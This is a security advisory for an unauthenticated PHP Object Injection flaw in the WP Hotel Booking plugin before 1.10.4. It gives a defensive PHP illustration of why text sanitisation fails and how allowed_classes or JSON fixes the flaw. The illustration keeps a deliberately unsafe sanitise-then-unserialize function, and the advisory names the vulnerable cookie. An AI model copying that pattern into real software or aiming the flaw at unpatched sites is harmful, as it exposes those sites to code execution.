WordPress Plugin Vulnerabilities

WP Hotel Booking < 1.10.4 - Unauthenticated PHP Object Injection

Description

The plugin unserialised the value of the thimpress_hotel_booking_1 cookie without sanitisation, which could lead to unauthenticated PHP Object Injection. If the plugin is installed on WP < 5.5.2, a suitable gadget chain is available to obtain RCE; otherwise, another gadget chain will have to be used (i.e. from another installed plugin, for instance).

The fix attempted in 1.10.3 (i.e. sanitising the cookie value through sanitize_text_field()) does nothing against PHP Object Injection, and the plugin was still vulnerable despite the original advisory stating that the issue had been fixed. This was escalated to the WordPress plugin team on March 4th, 2021, and version 1.10.4, released on March 19th, 2021, fixed the issue.
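
Why text sanitisation does not help here, as an added example that is not the plugin's code and not its 1.10.4 patch: a serialized object is plain printable text, so a tag-and-whitespace cleaner passes it through and unserialize() still instantiates the class. DemoMarker, the read_cookie_* helpers and text_sanitise_stand_in() (a rough approximation of sanitize_text_field(), not the WordPress implementation) are hypothetical names, and the cookie value is constructed.

```php
<?php
// Added illustration; class names, helper names and sample values are constructed.

// Harmless stand-in for any class with a magic method that runs on unserialize().
class DemoMarker {
    public static $woken = false;
    public $note = '';
    public function __wakeup() { self::$woken = true; }
}

// Assumption: approximates only the text-cleaning steps of sanitize_text_field()
// (strip tags, collapse whitespace, trim); it is not the WordPress implementation.
function text_sanitise_stand_in(string $value): string {
    $value = strip_tags($value);
    $value = preg_replace('/[\r\n\t ]+/', ' ', $value);
    return trim($value);
}

// Pattern described by the advisory: text-sanitise the cookie, then unserialize() it.
function read_cookie_unsafe(string $raw) {
    return unserialize(text_sanitise_stand_in($raw));
}

// Hardened option 1: tell unserialize() never to instantiate a class.
function read_cookie_no_classes(string $raw) {
    return unserialize($raw, ['allowed_classes' => false]);
}

// Hardened option 2: keep cookie data as JSON, which can only decode to plain data.
function read_cookie_json(string $raw): array {
    $data = json_decode($raw, true);
    return is_array($data) ? $data : [];
}

// Constructed cookie value: a serialized DemoMarker, as a client could submit it.
$cookie = serialize(new DemoMarker());

// Check 1: does text cleaning alter the serialized value at all?
var_dump(text_sanitise_stand_in($cookie) === $cookie);

// Check 2: does the sanitise-then-unserialize path build the object and run __wakeup()?
$obj = read_cookie_unsafe($cookie);
var_dump($obj instanceof DemoMarker, DemoMarker::$woken);

// Check 3: with allowed_classes disabled, is any class code reached?
DemoMarker::$woken = false;
$obj = read_cookie_no_classes($cookie);
var_dump($obj instanceof __PHP_Incomplete_Class, DemoMarker::$woken);

// Check 4: the JSON reader rejects a serialized value outright.
var_dump(read_cookie_json($cookie));
```

The allowed_classes option requires PHP 7.0 or later; switching the cookie format to JSON removes the dependency on unserialize() for client-controlled data altogether.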

Affects Plugins

Fixed in 1.10.4

Classification

Type
OBJECT INJECTION

Miscellaneous

Original Researcher
Nick Blundell, AppCheck Ltd
Verified
Yes

Timeline

Publicly Published
2020-12-08
Added
2021-03-09
Last Updated
2021-03-20
